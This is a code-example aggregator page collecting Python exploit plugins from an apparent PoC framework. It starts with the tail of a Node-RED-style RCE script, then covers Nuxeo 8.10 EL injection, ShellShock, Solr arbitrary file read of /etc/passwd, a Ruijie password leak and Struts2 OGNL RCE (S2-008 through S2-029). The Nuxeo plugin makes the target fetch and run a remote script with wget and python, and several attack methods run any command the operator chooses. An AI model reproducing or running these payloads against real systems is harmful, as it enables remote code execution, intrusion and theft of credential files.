            await websocket.send(json.dumps({"auth": access_token}))
            while True:
                response = await websocket.recv()
                message = json.loads(response)
                if "auth" in message and message["auth"] == "ok":
                    print("[+] Successfully authenticated over WebSocket.")
                    break

        print("[+] Establishing RCE link ....")
        await websocket.send(json.dumps({"subscribe": "debug"}))
        current_flows = {"flows": []}
        try:
            resp = requests.get("{}/flows".format(url), headers=headers)
            if "flows" in resp.json():
                current_flows["flows"] = resp.json()["flows"]
            payload = {"flows": merge_lists(current_flows["flows"], EXEC_FLOW, "id")}
            for flow in payload["flows"]:
                if flow["id"] == EXEC_BLOCK_NAME:
                    flow["command"] = command

            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )

            resp = requests.post("{}/inject/{}".format(url, INJECT_BLOCK_NAME), headers=headers)

            output = None
            if not shell:
                while output is None:
                    response = await websocket.recv()
                    messages = json.loads(response)
                    for message in messages:
                        if "topic" in message and message["topic"] == "debug":
                            output = message["data"]["msg"].strip()
                            break

        except KeyboardInterrupt:
            payload = {"flows": []}
            for current_block in current_flows["flows"]:
                tainted = False
                for block in EXEC_FLOW:
                    if block["id"] == current_block["id"]:
                        tainted = True
                if not tainted:
                    payload["flows"].append(current_block)

            print("\n[+] Cleaning up workflows.")
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )
            if resp.status_code == 200:
                print("[+] Done.")
            else:
                print("[!] An error occured. Manual cleanup might be required.")
        finally:
            websocket.close()
        return output


def start(url, command, username, password, shell=False):

0 Source : ruijie_info.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        ####
        headers = {
            "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20"
        }

        path = "login.php"

        verify_code = '"role":"super_admin","name":"'
        verify_code2 = '","password":"'

        url = urljoin(self.url, path)

        resp = requests.get(url=url, headers=headers, timeout=8)
        # resp = requests.post(url, data=payload)
        try:
            if verify_code in resp.text and verify_code2 in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = "源代码密码泄露,页面搜索admin关键词即可看到密码hash"
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }
        result = {}
        httpServerIp = self.get_option('http_server_ip')
        httpServerPort = self.get_option('http_server_port')
        # 因为使用了format对字符串格式化, 故需要在原来的payload里多加一层{},否则会报错
        payload_part1 = "/?key=#{{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'wget {0}:{1}/note.py')}}".format(httpServerIp, httpServerPort)
        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part1
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            if rr.status_code == 302 or rr.status_code == 200:
                result['status'] = 'success'
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def _attack(self):

0 Source : Nuxeo_8_10_RCE.py
with GNU General Public License v3.0
from 78778443

    def _shell(self):
        self._verify()

        proxies = {
            'http': 'http://127.0.0.1:8080',
            'https': 'http://127.0.0.1:8080'
        }

        payload_part2 = "/?key=#{request.setAttribute('methods',''['class'].forName('java.lang.Runtime').getDeclaredMethods())" \
                        "---request.getAttribute('methods')[15].invoke(request.getAttribute('methods')[7].invoke(null), " \
                        "'python note.py')}"

        url = urljoin(self.url, "/nuxeo/create_file.xhtml")
        params = {
            'actionMethod': "widgets/suggest_add_new_directory_entry_iframe.xhtml:request.getParameter('directoryNameForPopup')",
            'directoryNameForPopup': payload_part2
        }
        try:
            rr = requests.get(url, params=params, verify=False)
            if rr.status_code == 302 or rr.status_code == 200:
                pass
        except ReadTimeout:
            pass
        except Exception as e:
            pass

register_poc(DemoPOC)

0 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}

        try:
            vul_url = get_url_need(self.url)
            if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):
                pass
            else:
                random_str = ''.join(random.sample(string.ascii_letters + string.digits, 50))
                headers_fake = {}
                headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str

                response = requests.get(vul_url, headers=headers_fake)
                response = response.text

                if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_url
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def parse_output(self, result):

0 Source : ShellShock_Bash_RCE.py
with GNU General Public License v3.0
from 78778443

def get_link(url):
    rnt = ''
    try:
        page_content = requests.get(url).text
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
        for item_url in match:
            if not item_url.startswith('http'):
                item_url = getAbsoluteURL(url, item_url)
            if not is_url_exist(item_url):
                continue
            if isSameDomain(item_url, url):
                rnt = item_url
                break
        return rnt
    except:
        # raise e
        return rnt


def getAbsoluteURL(base, url):

0 Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # 获取core
            url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            response = req.get(url1, headers=headers,timeout=5)
            core_name = list(json.loads(response.text)["status"])[0]
            # 开启equestDispatcher.requestParsers.enableRemoteStreaming
            url2 = target + "/solr/" + core_name + "/config"
            headers = {"Content-type":"application/json"}
            data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
            response = req.get(url2, data=data,headers=headers, timeout=5)
            if 'responseHeader' in response.text and response.status_code == 200:
                # 读取文件
                url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                data = 'stream.url=file:///etc/passwd'
                response = req.get(url3, data=data, headers=headers, timeout=5)
                if 'No such file or directory' not in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    break
        return self.parse_output(result)

    def _attack(self):

0 Source : solr_all_readfile.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [8983]
        for port in ports:
            target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
            # 获取core
            url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
            headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
                       "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
            response = req.get(url1, headers=headers, timeout=10)
            core_name = list(json.loads(response.text)["status"])[0]
            # 开启equestDispatcher.requestParsers.enableRemoteStreaming
            url2 = target + "/solr/" + core_name + "/config"
            headers = {"Content-type":"application/json"}
            data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
            response = req.get(url2, data=data,headers=headers, timeout=5)
            if 'responseHeader' in response.text and response.status_code == 200:
                # 读取文件
                filename = self.get_option("filename")
                url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
                headers = {"Content-Type": "application/x-www-form-urlencoded"}
                data = 'stream.url=file://{}'.format(filename)
                response = req.get(url3, data=data, headers=headers, timeout=5)
                if 'No such file or directory' not in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = response.text
                    break
        return self.parse_output(result)

    def _shell(self):

0 Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
            '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
            'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
            '27RECOMMAND%27%29.getInputStream%28%29%29)'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_008_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        result = {}
        cmd = self.get_option("command")
        payload = '?debug=command&expression=(%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%' \
                  '23foo%3Dnew%20java.lang.Boolean%28"false"%29%20%2C%23context%5B"xwork.MethodAccessor.denyMethodExecutio' \
                  'n"%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%' \
                  '27RECOMMAND%27%29.getInputStream%28%29%29)'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass
        return self.parse_output(result)


register_poc(DemoPOC)

0 Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
                  "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
                  "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
                  "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
                  "%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
                  "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS, data=payload)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Postdata'] = payload
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_009_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        payload = "(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false)," \
                  "+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(" \
                  "%27RECOMMAND%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a)," \
                  "%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d)," \
                  "%[email protected]@getResponse().getWriter(),%23kxlzx.println(" \
                  "%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)] "
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS, data=payload)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


register_poc(DemoPOC)

0 Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
            'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
            '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
            'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
            '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
            '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
            'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
            'ing(%23d))%2C%23out.close()%7D'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_013_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        payload = '?233=%24%7B%23_memberAccess%5B"allowStaticMetho' \
                  'dAccess"%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime()' \
                  '.exec(%27RECOMMAND%27).getInputStream()%2C%23b%3Dnew%20java.io.' \
                  'InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%' \
                  '23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%' \
                  '3D%40org.apache.struts2.ServletActionContext%40getResponse().ge' \
                  'tWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.Str' \
                  'ing(%23d))%2C%23out.close()%7D'
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


register_poc(DemoPOC)

0 Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        # vulmap这个地方的payload是写死了的,执行的命令为id,执行的结果会在404页面显示出来
        payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
            r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
            r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
            r"utStream())}.action"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response.status_code == 404 and flag in response.text: # 这个地方不能判断response对象存在
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_015_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        # vulmap这个地方的payload是写死了的,执行的命令为id,执行的结果会在404页面显示出来
        payload = r"/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAcces" \
                  r"s.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberA" \
                  r"ccess, true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('RECOMMAND').getInp" \
                  r"utStream())}.action"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response.status_code == 404:  # 这个地方不能判断response对象存在
                res = parse.unquote(str(re.findall(r"  <  p> < b>Message < /b>(.*?) < /p>", response.content.decode('utf-8'))))
                result['Stdout'] = res
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


register_poc(DemoPOC)

0 Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):

        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
            r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
            r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
            r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
            r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
            r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
            r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
            r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
            r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
            r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
            r"(),%23resp.getWriter().close()}"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_016_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        payload = r"?redirect:${%23req%3d%23context.get(%27co%27" \
                  r"%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atc" \
                  r"her.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java" \
                  r".util.Scanner((new%20java.lang.ProcessBuilder(%27RECOMMAND%27." \
                  r"toString().split(%27\\s%27))).start().getInputStream()).useDel" \
                  r"imiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27," \
                  r"%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony" \
                  r".xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes" \
                  r"%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27)," \
                  r"%23resp.getWriter().println(%23str),%23resp.getWriter().flush" \
                  r"(),%23resp.getWriter().close()}"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


register_poc(DemoPOC)

0 Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443

    def _verify(self):

        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = "echo VuLnEcHoPoCSuCCeSS"
        payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
            r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
            r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
            r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
            r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
            r"()))"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload
        flag = "VuLnEcHoPoCSuCCeSS"

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200 and flag in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)

    def parse_output(self, result):

0 Source : struts2_029_rce.py
with GNU General Public License v3.0
from 78778443

    def _attack(self):
        HEADERS = {
            'Accept': 'application/x-shockwave-flash,'
                      'image/gif,'
                      'image/x-xbitmap,'
                      'image/jpeg,'
                      'image/pjpeg,'
                      'application/vnd.ms-excel,'
                      'application/vnd.ms-powerpoint,'
                      'application/msword,'
                      '*/*',
            'Content-Type': 'application/x-www-form-urlencoded'
        }

        result = {}
        cmd = self.get_option("command")
        payload = r"(%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtected" \
                  r"Access%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperti" \
                  r"es%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAcce" \
                  r"ss[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,@org.a" \
                  r"pache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27RECOMMAND%27).getInputStream" \
                  r"()))"
        payload = payload.replace("RECOMMAND", cmd)
        url = self.url + payload

        try:
            response = requests.get(url, headers=HEADERS)
            if response and response.status_code == 200:
                result['Stdout'] = response.text
        except ReadTimeout:
            pass
        except Exception as e:
            pass

        return self.parse_output(result)


register_poc(DemoPOC)

See More Examples